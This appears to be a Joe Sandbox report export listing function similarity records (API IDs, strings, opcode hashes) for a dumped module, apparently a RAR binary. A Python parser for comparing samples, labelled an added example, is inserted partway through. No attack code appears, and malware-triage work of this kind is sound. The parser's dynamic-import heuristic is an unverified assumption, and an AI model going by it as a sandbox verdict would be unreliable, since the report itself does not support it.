                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Security$File$DescriptorLength
                                                                                                                                                                                                                                        • String ID: $ACL
                                                                                                                                                                                                                                        • API String ID: 2361174398-1852320022
                                                                                                                                                                                                                                        • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                        • Instruction ID: 74a5a5cfb84d7eee4d4e00aaccb69ed89a8ea762b6718a801e70f7b166e6da51
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C318461A0AB81E1E721DB11E5503E963A5FF88784F844077DA8D8379ADF3CEA16C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: AddressCompareHandleModuleOrdinalProcStringVersion
• String ID: CompareStringOrdinal$kernel32.dll
• API String ID: 2522007465-2120454788
• Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
• Instruction ID: 520feca61e1320640884c9c327fde26b8fb6366a6ede0e2de6962dd04ea6d59a
• Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
• Instruction Fuzzy Hash: 04219221A0F682D5E6529B51A94017862E2BF54BC0F5841B7EE5DC3A98EF2CED4B8300

APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: Time$File$swprintf$LocalSystem
• String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
• API String ID: 1364621626-1794493780
• Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
• Instruction ID: 84ede4716b8cb6ded8cb4cb0c9bc224d836621c095a71310241ff7a8fdab1a11
• Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
• Instruction Fuzzy Hash: 3E21D076A19241DAE761CF69E480A9D77F0FB48798F544076EE48D3B48DB39E842CF10

APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
• Instruction ID: f0d4784c3b9676ad91997fdf7ca3f89ec950e939eadb2e6ae03f2e5ead2fdece
• Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
• Instruction Fuzzy Hash: E9F04461B1A682E1EE968B11F46027D2360EF88B80F44107BE94F86664EE3CDC468700

Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
• Instruction ID: 8d45e759207c4a1e0bb92b7e7f43b7f08571aec258f24e92c25bda9d32523b14
• Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
• Instruction Fuzzy Hash: 59A1E962F0A782E5EB738B5088103B96692AF46BA4F484677D95D86BC5DF3CDC478380

APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
• Instruction ID: 5fbf977b409360d94581588d6e2cc646893028589291e8df916bced0af8856fa
• Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
• Instruction Fuzzy Hash: 3081C122F1A652E9F7329B6588806BD66E4BB46B84F0441B7DD0E93B95DF3CA847C310
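
The records above are Joe Sandbox's per-function similarity data for the dumped module based at 00007FF6AA180000: one block per function, each carrying the dump it came from, the API and string identifiers the function references, and opcode/instruction hashes for cross-sample matching. The following is an added example, not Joe Sandbox tooling, that parses such records from a plain-text export of the report and indexes them for triage. SAMPLE is a constructed excerpt that reproduces two of the records above (with the "Download File" link text that extraction glues onto Associated lines, which the parser strips). The DLL-name heuristic in dynamic_import_candidates and the Jaccard comparison in opcode_overlap are assumptions about how an analyst would use these fields, not anything the report states.

```python
"""Parse Joe Sandbox "Memory Dump Source / Similarity" function records.
Added example, not Joe Sandbox tooling. SAMPLE is a constructed excerpt that
reproduces two records from the report above, one Associated line kept."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
• Instruction ID: f0d4784c3b9676ad91997fdf7ca3f89ec950e939eadb2e6ae03f2e5ead2fdece
• Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
• Instruction Fuzzy Hash: E9F04461B1A682E1EE968B11F46027D2360EF88B80F44107BE94F86664EE3CDC468700
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
• Instruction Fuzzy Hash: 59A1E962F0A782E5EB738B5088103B96692AF46BA4F484677D95D86BC5DF3CDC478380
"""

# "• Key: value" lines; the bullet is optional so plain-text exports parse too.
FIELD_RE = re.compile(r"^[•*-]?\s*([A-Za-z ]+?):\s*(.*)$")


@dataclass
class FunctionRecord:
    fields: Dict[str, str] = field(default_factory=dict)  # raw "Key: value" pairs as printed
    associated: List[str] = field(default_factory=list)   # other dump regions of the same module
    image_base: str = ""                                  # "Offset:" value from Source File
    strings: List[str] = field(default_factory=list)      # String ID split on '$'
    api_hash: Optional[int] = None                        # API String ID, left half
    string_hash: Optional[int] = None                     # API String ID, right half

    @property
    def opcode_id(self) -> str:
        return self.fields.get("Opcode ID", "")

    @property
    def api_id(self) -> str:
        return self.fields.get("API ID", "")


def parse_records(text: str) -> List[FunctionRecord]:
    """One record per 'Memory Dump Source' block; tab labels and headings are skipped."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = FunctionRecord()
            records.append(cur)
            continue
        m = FIELD_RE.match(line)
        if cur is None or not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Associated":  # drop the "Download File" link text glued on by extraction
            cur.associated.append(value.replace("Download File", "").strip())
            continue
        cur.fields[key] = value
        if key == "Source File":
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", value)
            cur.image_base = off.group(1) if off else ""
        elif key == "String ID":
            cur.strings = [s for s in value.split("$") if s]
        elif key == "API String ID" and "-" in value:
            a, b = value.split("-", 1)
            cur.api_hash, cur.string_hash = int(a), int(b)
    return records


def dynamic_import_candidates(records: List[FunctionRecord]) -> List[FunctionRecord]:
    """Heuristic (an assumption, not a Joe Sandbox verdict): a String ID pairing an
    export name with a DLL name usually marks a function that resolves that API at
    run time rather than through the import table, so it merits a manual look."""
    return [r for r in records if any(s.lower().endswith(".dll") for s in r.strings)]


def opcode_overlap(a: List[FunctionRecord], b: List[FunctionRecord]) -> float:
    """Jaccard overlap of Opcode ID sets: a cheap estimate of code shared between
    two samples' function lists, which is what the Similarity fields are for."""
    sa = {r.opcode_id for r in a if r.opcode_id}
    sb = {r.opcode_id for r in b if r.opcode_id}
    return len(sa & sb) / len(sa | sb) if (sa or sb) else 0.0
```

Run `parse_records` over the text export of two reports and feed both lists to `opcode_overlap` to get a shared-code estimate; the candidates list is the shortlist to open in the disassembler first.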

APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
• String ID:
• API String ID: 3659116390-0
• Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
• Instruction ID: 8518796b86bf7aa4392142c46b2af54d75a2568eb16a8bb4153205a2c85fe361
• Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
• Instruction Fuzzy Hash: 9651B032A15A51DAF722CF25D4443BC3BB0BB49B98F048176DE4A87B98DF38D946C700

APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: CharHandleWrite$ByteConsoleFileMultiWide
• String ID:
• API String ID: 643171463-0
• Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
• Instruction ID: 23709357a30434aec5561181231692e26601c191468809aed8013947561cb52c
• Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
• Instruction Fuzzy Hash: C641F561E0A642E2F9229B20A9102BD63A4EF45BA0F04037BED6D977D5DF3CAD47C340

APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
• Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
• Instruction ID: bc79df88e1aebe242a49c27421aebcd2cee7b599549ef54e51bf3e8d5dd40a62
• Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
• Instruction Fuzzy Hash: 8E41F431B0B602E1FE668B01A900575A6A1BF45BD0F9D8577DD2ECBB84EE3CEC129300

APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
• Instruction ID: 9ede3cf05966c6f62804b1c275c36d8c25df8b01223b147e8cd2276492604d22
• Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
• Instruction Fuzzy Hash: A811C436E19603B5F67A1124E48677911416F47BF0E084ABFE97EC7ED6CEACBC424205

APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: wcschr$BeepMessage
• String ID: ($[%c]%ls
• API String ID: 1408639281-228076469
• Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
• Instruction ID: 1dae2a7cc93c51b3ba0be52bcd701d22a83c181f7a81cf0e8531d93e915e7560
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6081E632A0A681D6EA66CF05E5402BA67A5FF84B88F440577EA4E97755EF3CE902C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: swprintf
                                                                                                                                                                                                                                        • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                                                                                                                                                                                                        • API String ID: 233258989-622958660
                                                                                                                                                                                                                                        • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                                        • Instruction ID: 97db14390a5f450664d433cbf8a9e9120500d8dbd859c44bdf76bdfd5c5f3337
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51517BF3F382449AE3158F1CE841BA92691F364B90F545A2AF94AD3B44DA3DDF058700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
